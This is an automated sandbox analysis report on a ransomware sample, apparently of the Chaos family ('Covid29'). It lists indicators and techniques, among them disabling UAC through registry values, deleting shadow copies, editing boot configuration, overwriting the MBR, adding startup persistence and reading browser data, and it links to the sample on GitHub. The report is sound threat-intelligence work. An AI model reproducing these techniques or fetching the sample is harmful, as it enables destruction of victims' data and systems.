Analysis
-
max time kernel
135s -
max time network
135s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
03-08-2024 16:16
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/pankoza2-pl/malwaredatabase-old/blob/main/xbox%20360%20hax%202008.bat
Resource
win10-20240404-en
General
-
Target
https://github.com/pankoza2-pl/malwaredatabase-old/blob/main/xbox%20360%20hax%202008.bat
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 3 IoCs
resource yara_rule behavioral1/files/0x000800000001ac2e-469.dat family_chaos behavioral1/memory/3548-476-0x0000000000790000-0x00000000007B0000-memory.dmp family_chaos behavioral1/memory/1856-548-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4620 bcdedit.exe 1452 bcdedit.exe -
pid Process 5016 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 1148 mbr.exe 3548 Cov29Cry.exe 648 svchost.exe 1244 Cov29LockScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1856-443-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/1856-548-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops desktop.ini file(s) 35 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3968772205-1713802336-1776639840-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 39 raw.githubusercontent.com 40 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\n4ew96dyp.jpg" svchost.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log mspaint.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cov29LockScreen.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TrojanRansomCovid29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5092 PING.EXE 2752 PING.EXE 4624 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3332 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4144 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133671754236844697" chrome.exe -
Modifies registry class 56 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings cmd.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Mode = "1" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\IconSize = "96" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings calc.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000050000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000b474dbf787420341afbaf1b13dcd75cf64000000a000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000e0859ff2f94f6810ab9108002b27b3d90500000058000000 mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\LogicalViewMode = "3" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = ffffffff mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1092616257" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000001ab8b4e68986da013a5ffd6d8e86da013a5ffd6d8e86da0114000000 mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac04000000c8000000354b179bff40d211a27e00c04fc308710300000080000000354b179bff40d211a27e00c04fc308710200000080000000 mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell mspaint.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\NodeSlot = "3" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Pictures" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByDirection = "1" mspaint.exe Set value (data) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} mspaint.exe Set value (int) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" mspaint.exe Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} mspaint.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 424 reg.exe 3044 reg.exe 3636 reg.exe 5092 reg.exe 1152 reg.exe 1992 reg.exe 4668 reg.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5092 PING.EXE 2752 PING.EXE 4624 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 4572 regedit.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 648 svchost.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
pid Process 3608 chrome.exe 3608 chrome.exe 2440 mspaint.exe 2440 mspaint.exe 3608 chrome.exe 3608 chrome.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 3548 Cov29Cry.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe 648 svchost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2440 mspaint.exe 4572 regedit.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
pid Process 3608 chrome.exe 3608 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe Token: SeShutdownPrivilege 3608 chrome.exe Token: SeCreatePagefilePrivilege 3608 chrome.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe 3608 chrome.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 2440 mspaint.exe 2440 mspaint.exe 2440 mspaint.exe 2440 mspaint.exe 896 OpenWith.exe 2440 mspaint.exe 1244 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3608 wrote to memory of 1384 3608 chrome.exe 74 PID 3608 wrote to memory of 1384 3608 chrome.exe 74 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 3608 wrote to memory of 4056 3608 chrome.exe 76 PID 